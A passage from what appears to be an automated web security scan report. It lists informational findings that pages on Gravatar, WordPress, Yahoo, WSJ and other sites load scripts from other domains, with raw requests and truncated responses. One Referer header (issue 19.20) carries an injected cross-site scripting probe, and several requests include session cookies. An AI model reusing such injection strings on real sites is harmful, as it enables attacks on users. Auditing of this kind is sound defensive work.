The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:30:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 9877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<link href="http://s.gravatar.com/css/jquery.Jcrop.css?48" type="text/css" rel="stylesheet" media="screen" />
   <script type="text/javascript" src="http://wordpress.com/remote-login.php?action=js&amp;id=120742&amp;host=en.gravatar.com&amp;back=en.gravatar.com%2F&amp;t=1308011408"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.11. http://en.gravatar.com/account/forgot-password/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /account/forgot-password/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /account/forgot-password/ HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.4.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 5612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.12. http://en.gravatar.com/site/implement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /site/implement

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /site/implement HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.1.10.1308011412; __qca=P0-894869797-1308011414185

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:01 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<link href="http://s.gravatar.com/css/jquery.Jcrop.css?48" type="text/css" rel="stylesheet" media="screen" />
   <script type="text/javascript" src="http://wordpress.com/remote-login.php?action=js&amp;id=120742&amp;host=en.gravatar.com&amp;back=en.gravatar.com%2Fsite%2Fimplement&amp;t=1308011581"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.13. http://en.gravatar.com/site/login/%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /site/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<link href="http://s.gravatar.com/css/jquery.Jcrop.css?48" type="text/css" rel="stylesheet" media="screen" />
   <script type="text/javascript" src="http://wordpress.com/remote-login.php?action=js&amp;id=120742&amp;host=en.gravatar.com&amp;back=en.gravatar.com%2Fsite%2Flogin%2F%25252F&amp;t=1308011602"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.14. http://en.gravatar.com/site/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /site/signup/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /site/signup/ HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.3.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 5816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<link href="http://s.gravatar.com/css/jquery.Jcrop.css?48" type="text/css" rel="stylesheet" media="screen" />
   <script type="text/javascript" src="http://wordpress.com/remote-login.php?action=js&amp;id=120742&amp;host=en.gravatar.com&amp;back=en.gravatar.com%2Fsite%2Fsignup%2F&amp;t=1308011610"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.15. https://en.wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /signup/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /signup/ HTTP/1.1
Host: en.wordpress.com
Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D; ref=bottomtext

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:48 GMT
Content-Type: text/html
Connection: close
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Vary: Accept-Encoding
Content-Length: 28577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head profile="
...[SNIP]...
</div>
<script type="text/javascript" src="https://ssl.google-analytics.com/ga.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?v&#038;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://sb.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
19.16. http://intensedebate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 18458

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://s.intensedebate.com/css/sys.css?q=57" /><script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/'></script>
...[SNIP]...
</script>
<script src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0005/5406.js" type="text/javascript"> </script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.17. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42340


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</div>
<script type="text/javascript" src="https://s.yimg.com/lq/combo?yui-ssl/2.8.1/build/yahoo/yahoo-min.js&yui-ssl/2.8.1/build/dom/dom-min.js&yui-ssl/2.8.1/build/event/event-min.js&yui-ssl/2.8.1/build/animation/animation-min.js"></script>
...[SNIP]...
</script>
<script src="https://s.yimg.com/lq/lib/reg/js/login_md5_217221.js" type="text/javascript"></script>
...[SNIP]...
19.18. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /adui/signin/displaySignin.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adui/signin/displaySignin.do HTTP/1.1
Host: marketingsolutions.login.yahoo.com
Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: JSESSIONID=C08D800A7F9FFF726A8F260F8117457E.; Path=/adui; Secure
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ALP=bTowJmw6ZW5fVVMm; Domain=.yahoo.com; Expires=Wed, 13-Jun-2012 06:10:31 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34149

<html lang="en"><head>
<script type="text/javascript">
if (top != self) top.location.href = location.href;

document.domain = "login.yahoo.com";
</script>

<title>
Sponsored Search Lo
...[SNIP]...
</script>

<script type="text/javascript" src="https://a248.e.akamai.net/sec.yimg.com/lib/ypn/adapp_2_7_0_0_1/js/jscaf_bundle.js"></script>
...[SNIP]...
19.19. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
...[SNIP]...
19.20. http://us.havaianas.com/MYOH.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.havaianas.com
Path:   /MYOH.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /MYOH.html HTTP/1.1
Host: us.havaianas.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:56:05 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 14:07:36 GMT
ETag: "3fe0003-740e-4df619a8"
Accept-Ranges: bytes
Content-Length: 29710
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language='javascript' src='https://sales.liveperson.net/hc/12987554/x.js?cmd=file&file=chatScript3&site=12987554&&imageUrl=https://www.havaianasus.com/images'> </script>
...[SNIP]...
19.21. http://videopress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videopress.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: videopress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 14 Jun 2011 00:30:38 +0000
Cache-Control: max-age=234, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://videopress.com/xmlrpc.php
Link: <http://wp.me/PLXkB-6>; rel=shortlink
X-nananana: Batcache
Content-Length: 20628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" lang
...[SNIP]...
<meta name="msvalidate.01" content="4A240F7CEF090DA840A4FE3F6F524722" />
       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=videopress.com&amp;id=11429489&amp;t=1308011438&amp;back=videopress.com%2F' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='sharedaddy-css' href='http://s1.wp.com/wp-content/mu-plugins/sharing/sharing.css?m=1307113715g&#038;ver=MU' type='text/css' media='all' />
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/l10n.js?m=1306159264g&amp;ver=20101110'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1306159264g&amp;ver=1.6.1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/swfobject.js?m=1306159264g&amp;ver=2.2'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?v&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1306159270g&amp;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.js?m=1306159269g&amp;ver=0.2'></script>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...
19.22. http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://windows.microsoft.com
Path:   /en-US/internet-explorer/downloads/ie-9/worldwide-languages

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-US/internet-explorer/downloads/ie-9/worldwide-languages HTTP/1.1
Host: windows.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/products/ie/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; Ms.Wol.WindowsEdition=0; MS0=52319cad089b46ffaf7cb2f75a658057; WT_NVR=0=/:1=en-us:2=en-us/internet-explorer:3=en-us/internet-explorer/products; s_cc=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1308000884555:ss=1308000855276; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 420543
Content-Type: text/html
Expires: Tue, 14 Jun 2011 00:44:45 GMT
Last-Modified: Sat, 19 Feb 2011 14:07:43 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-UA-Compatible: IE=9
Date: Tue, 14 Jun 2011 00:34:45 GMT


